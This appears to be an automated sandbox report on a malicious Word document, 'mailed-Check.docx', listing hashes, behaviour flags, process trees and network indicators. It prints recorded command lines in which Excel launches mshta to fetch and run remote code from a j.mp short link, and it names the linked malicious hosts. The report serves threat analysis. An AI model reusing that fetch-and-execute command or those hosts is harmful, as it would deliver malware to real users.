analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

mailed-Check.docx

Full analysis: https://app.any.run/tasks/b0f0b1dc-998f-4ff4-ac65-797a9c6c6502
Verdict: Malicious activity
Analysis date: October 09, 2019, 17:41:51
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/vnd.openxmlformats-officedocument.wordprocessingml.document
File info: Microsoft Word 2007+
MD5:

E1A140C17F21569B80E3B836AA6DE961

SHA1:

D1BE9467536D6CF8CF9BEABEDEAF8C97E0FC50F9

SHA256:

25ABB81E40FC852703936AE6D34C95A0C8265394BA738063FCC2521698A80A9E

SSDEEP:

1536:XrellrelGrzB/QhoCDW+4oDCdYH6oi4jRafCHx:Xrezre8/aDCdFoBjRaaR

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 2872)
      • EXCEL.EXE (PID: 2224)
      • EXCEL.EXE (PID: 1472)
      • EXCEL.EXE (PID: 432)
      • EXCEL.EXE (PID: 4004)
      • EXCEL.EXE (PID: 712)
    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • EXCEL.EXE (PID: 2872)
      • EXCEL.EXE (PID: 2224)
      • EXCEL.EXE (PID: 1472)
      • EXCEL.EXE (PID: 432)
      • EXCEL.EXE (PID: 4004)
      • EXCEL.EXE (PID: 712)
    • Changes the autorun value in the registry

      • mshta.exe (PID: 2356)
      • mshta.exe (PID: 2716)
      • mshta.exe (PID: 2604)
      • mshta.exe (PID: 2984)
      • mshta.exe (PID: 3896)
      • mshta.exe (PID: 2788)
  • SUSPICIOUS

    • Executed via COM

      • EXCEL.EXE (PID: 2872)
      • EXCEL.EXE (PID: 2224)
      • EXCEL.EXE (PID: 1472)
      • EXCEL.EXE (PID: 4004)
      • EXCEL.EXE (PID: 432)
      • EXCEL.EXE (PID: 712)
      • excelcnv.exe (PID: 2528)
      • excelcnv.exe (PID: 2712)
      • excelcnv.exe (PID: 2956)
      • excelcnv.exe (PID: 1680)
      • excelcnv.exe (PID: 3312)
      • excelcnv.exe (PID: 3960)
    • Creates files in the user directory

      • mshta.exe (PID: 2356)
      • mshta.exe (PID: 2716)
      • mshta.exe (PID: 3896)
      • mshta.exe (PID: 2604)
      • mshta.exe (PID: 2788)
      • mshta.exe (PID: 2984)
    • Reads Internet Cache Settings

      • mshta.exe (PID: 3896)
      • mshta.exe (PID: 2984)
  • INFO

    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 2872)
      • EXCEL.EXE (PID: 2224)
      • EXCEL.EXE (PID: 1472)
      • EXCEL.EXE (PID: 432)
      • EXCEL.EXE (PID: 4004)
      • excelcnv.exe (PID: 2712)
      • EXCEL.EXE (PID: 712)
      • excelcnv.exe (PID: 2528)
      • excelcnv.exe (PID: 3312)
      • excelcnv.exe (PID: 2956)
      • excelcnv.exe (PID: 3960)
      • excelcnv.exe (PID: 1680)
      • WINWORD.EXE (PID: 3084)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3084)
    • Reads internet explorer settings

      • mshta.exe (PID: 2356)
      • mshta.exe (PID: 2716)
      • mshta.exe (PID: 2604)
      • mshta.exe (PID: 3896)
      • mshta.exe (PID: 2984)
      • mshta.exe (PID: 2788)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.docx | Word Microsoft Office Open XML Format document (52.2)
.zip | Open Packaging Conventions container (38.8)
.zip | ZIP compressed archive (8.8)

EXIF

XML

AppVersion: 16
HyperlinksChanged: No
SharedDoc: No
CharactersWithSpaces: 60
LinksUpToDate: No
Company: -
ScaleCrop: No
Paragraphs: 1
Lines: 1
DocSecurity: None
Application: Microsoft Office Word
Characters: 52
Words: 9
Pages: 1
TotalEditTime: 1 minute
Template: Normal.dotm
ModifyDate: 2019:09:28 23:43:00Z
CreateDate: 2019:09:28 23:42:00Z
RevisionNumber: 2
LastModifiedBy: DA JADE
Keywords: -

XMP

Description: -
Creator: DA JADE
Subject: -
Title: -

ZIP

ZipFileName: [Content_Types].xml
ZipUncompressedSize: 1416
ZipCompressedSize: 368
ZipCRC: 0xc59e8d53
ZipModifyDate: 1980:01:01 00:00:00
ZipCompression: Deflated
ZipBitFlag: 0x0006
ZipRequiredVersion: 20
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
51
Monitored processes
19
Malicious processes
8
Suspicious processes
4

Behavior graph

Click at the process to see the details
start winword.exe excel.exe no specs mshta.exe excel.exe no specs mshta.exe excel.exe no specs mshta.exe excel.exe no specs mshta.exe excel.exe no specs mshta.exe excel.exe no specs mshta.exe excelcnv.exe no specs excelcnv.exe no specs excelcnv.exe no specs excelcnv.exe no specs excelcnv.exe no specs excelcnv.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3084"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\mailed-Check.docx"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2872"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\EXCEL.EXEsvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
2356mshta http:\\j.mp\adjkby5sxfsaasdiC:\Windows\system32\mshta.exe
EXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
2224"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\EXCEL.EXEsvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
2716mshta http:\\j.mp\adjkby5sxfsaasdiC:\Windows\system32\mshta.exe
EXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
1472"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\EXCEL.EXEsvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
2604mshta http:\\j.mp\adjkby5sxfsaasdiC:\Windows\system32\mshta.exe
EXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
432"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\EXCEL.EXEsvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
3896mshta http:\\j.mp\adjkby5sxfsaasdiC:\Windows\system32\mshta.exe
EXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
4004"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\EXCEL.EXEsvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
Total events
30 882
Read events
10 610
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
28
Text files
113
Unknown types
14

Dropped files

PID
Process
Filename
Type
3084WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRD21.tmp.cvr
MD5:
SHA256:
3084WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4F0DC276.wmf
MD5:
SHA256:
3084WINWORD.EXEC:\Users\admin\AppData\Local\Temp\{522D3A7A-7001-4A70-A293-377AE0556511}
MD5:
SHA256:
3084WINWORD.EXEC:\Users\admin\AppData\Local\Temp\{D18F18BE-CF00-48C3-B650-D4182C6E60D1}
MD5:
SHA256:
3084WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\75C109BB.doc
MD5:
SHA256:
2872EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVR9BA5.tmp.cvr
MD5:
SHA256:
2872EXCEL.EXEC:\Users\admin\AppData\Local\Temp\~DF93A76D686AADBAF2.TMP
MD5:
SHA256:
2224EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVRD1F8.tmp.cvr
MD5:
SHA256:
2356mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\authorization[1].css
MD5:
SHA256:
3084WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D51C0D37.wmf
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
24
TCP/UDP connections
93
DNS requests
14
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3084
WINWORD.EXE
OPTIONS
405
67.199.248.17:80
http://j.mp/
US
html
109 b
shared
3084
WINWORD.EXE
HEAD
301
67.199.248.16:80
http://j.mp/updatedic13
US
shared
3084
WINWORD.EXE
HEAD
301
67.199.248.16:80
http://j.mp/updatedic13
US
shared
3084
WINWORD.EXE
GET
301
67.199.248.17:80
http://j.mp/updatedic13
US
html
163 b
shared
3084
WINWORD.EXE
OPTIONS
405
67.199.248.17:80
http://j.mp/
US
html
109 b
shared
3084
WINWORD.EXE
HEAD
301
67.199.248.16:80
http://j.mp/updatedic13
US
shared
3896
mshta.exe
GET
301
67.199.248.16:80
http://j.mp/adjkby5sxfsaasdi
US
html
134 b
shared
976
svchost.exe
OPTIONS
405
67.199.248.16:80
http://j.mp/
US
html
109 b
shared
3084
WINWORD.EXE
HEAD
301
67.199.248.17:80
http://j.mp/updatedic13
US
html
163 b
shared
2356
mshta.exe
GET
301
67.199.248.16:80
http://j.mp/adjkby5sxfsaasdi
US
html
134 b
shared
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3084
WINWORD.EXE
67.199.248.17:80
j.mp
Bitly Inc
US
shared
2356
mshta.exe
67.199.248.16:80
j.mp
Bitly Inc
US
shared
976
svchost.exe
67.199.248.16:80
j.mp
Bitly Inc
US
shared
3084
WINWORD.EXE
67.199.248.16:80
j.mp
Bitly Inc
US
shared
3084
WINWORD.EXE
35.241.16.116:443
static.wixstatic.com
US
unknown
2356
mshta.exe
172.217.22.97:443
asdiamecwecw8cew.blogspot.com
Google Inc.
US
whitelisted
2716
mshta.exe
67.199.248.16:80
j.mp
Bitly Inc
US
shared
2716
mshta.exe
172.217.22.97:443
asdiamecwecw8cew.blogspot.com
Google Inc.
US
whitelisted
2356
mshta.exe
172.217.22.10:443
fonts.googleapis.com
Google Inc.
US
whitelisted
2356
mshta.exe
172.217.22.41:443
www.blogger.com
Google Inc.
US
whitelisted

DNS requests

Domain
IP
Reputation
j.mp
  • 67.199.248.16
  • 67.199.248.17
shared
dns.msftncsi.com
  • 131.107.255.255
shared
static.wixstatic.com
  • 35.241.16.116
whitelisted
asdiamecwecw8cew.blogspot.com
  • 172.217.22.97
whitelisted
www.blogger.com
  • 172.217.22.41
shared
resources.blogblog.com
  • 172.217.22.41
whitelisted
accounts.google.com
  • 216.58.207.77
shared
fonts.googleapis.com
  • 172.217.22.10
whitelisted
www.google.com
  • 172.217.16.132
whitelisted
fonts.gstatic.com
  • 172.217.23.163
whitelisted

Threats

PID
Process
Class
Message
3084
WINWORD.EXE
Misc activity
SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7)
2356
mshta.exe
Misc activity
SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7)
2716
mshta.exe
Misc activity
SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7)
3896
mshta.exe
Misc activity
SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7)
2984
mshta.exe
Misc activity
SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7)
2604
mshta.exe
Misc activity
SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7)
2788
mshta.exe
Misc activity
SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7)
No debug info